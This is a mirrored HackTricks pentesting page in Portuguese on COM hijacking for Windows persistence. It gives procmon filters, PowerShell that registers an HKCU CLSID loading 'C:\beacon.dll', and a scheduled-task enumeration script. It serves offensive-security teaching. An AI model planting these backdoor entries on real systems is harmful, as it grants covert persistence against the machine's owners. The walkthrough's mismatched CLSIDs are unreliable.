mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-21 02:23:30 +00:00
105 lines
6.4 KiB
Markdown
105 lines
6.4 KiB
Markdown
# COM Hijacking
|
|
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
- Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
|
|
|
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
|
|
- Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
|
|
- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
|
|
- **Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
|
|
</details>
|
|
|
|
### Procurando componentes COM inexistentes
|
|
|
|
Como os valores de HKCU podem ser modificados pelos usuários, o **COM Hijacking** pode ser usado como um mecanismo **persistente**. Usando o `procmon`, é fácil encontrar registros COM pesquisados que não existem e que um invasor poderia criar para persistir. Filtros:
|
|
|
|
* Operações **RegOpenKey**.
|
|
* onde o _Resultado_ é **NOME NÃO ENCONTRADO**.
|
|
* e o _Caminho_ termina com **InprocServer32**.
|
|
|
|
Depois de decidir qual COM inexistente se passar, execute os seguintes comandos. _Tenha cuidado se decidir se passar por um COM que é carregado a cada poucos segundos, pois isso pode ser excessivo._ 
|
|
```bash
|
|
New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}"
|
|
New-Item -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" -Name "InprocServer32" -Value "C:\beacon.dll"
|
|
New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32" -Name "ThreadingModel" -Value "Both"
|
|
```
|
|
### Componentes COM do Agendador de Tarefas suscetíveis a sequestro
|
|
|
|
As Tarefas do Windows usam, na verdade, Gatilhos Personalizados para chamar objetos COM. E, como são executados por meio do Agendador de Tarefas, é mais fácil prever quando serão acionados.
|
|
|
|
<pre class="language-powershell"><code class="lang-powershell"># Mostrar CLSIDs COM
|
|
$Tasks = Get-ScheduledTask
|
|
|
|
foreach ($Task in $Tasks)
|
|
{
|
|
if ($Task.Actions.ClassId -ne $null)
|
|
{
|
|
if ($Task.Triggers.Enabled -eq $true)
|
|
{
|
|
$usersSid = "S-1-5-32-545"
|
|
$usersGroup = Get-LocalGroup | Where-Object { $_.SID -eq $usersSid }
|
|
|
|
if ($Task.Principal.GroupId -eq $usersGroup)
|
|
{
|
|
Write-Host "Nome da Tarefa: " $Task.TaskName
|
|
Write-Host "Caminho da Tarefa: " $Task.TaskPath
|
|
Write-Host "CLSID: " $Task.Actions.ClassId
|
|
Write-Host
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
# Saída de exemplo:
|
|
<strong># Nome da Tarefa: Exemplo
|
|
</strong># Caminho da Tarefa: \Microsoft\Windows\Exemplo\
|
|
# CLSID: {1936ED8A-BD93-3213-E325-F38D112938E1}
|
|
# [mais saídas como a anterior...]</code></pre>
|
|
|
|
Verificando a saída, você pode selecionar uma que será executada **sempre que um usuário fizer login**, por exemplo.
|
|
|
|
Agora, procurando pelo CLSID **{1936ED8A-BD93-3213-E325-F38D112938EF}** em **HKEY\_**_**CLASSES\_**_**ROOT\CLSID** e em HKLM e HKCU, geralmente você descobrirá que o valor não existe em HKCU.
|
|
```bash
|
|
# Exists in HKCR\CLSID\
|
|
Get-ChildItem -Path "Registry::HKCR\CLSID\{1936ED8A-BD93-3213-E325-F38D112938EF}"
|
|
|
|
Name Property
|
|
---- --------
|
|
InprocServer32 (default) : C:\Windows\system32\some.dll
|
|
ThreadingModel : Both
|
|
|
|
# Exists in HKLM
|
|
Get-Item -Path "HKLM:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" | ft -AutoSize
|
|
|
|
Name Property
|
|
---- --------
|
|
{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1} (default) : MsCtfMonitor task handler
|
|
|
|
# Doesn't exist in HKCU
|
|
PS C:\> Get-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
|
|
Get-Item : Cannot find path 'HKCU:\Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}' because it does not exist.
|
|
```
|
|
Então, você pode simplesmente criar a entrada HKCU e toda vez que o usuário fizer login, sua porta dos fundos será ativada.
|
|
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
- Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
|
|
|
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
|
|
- Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
|
|
- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
|
|
- **Compartilhe seus truques de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
|
|
</details>
|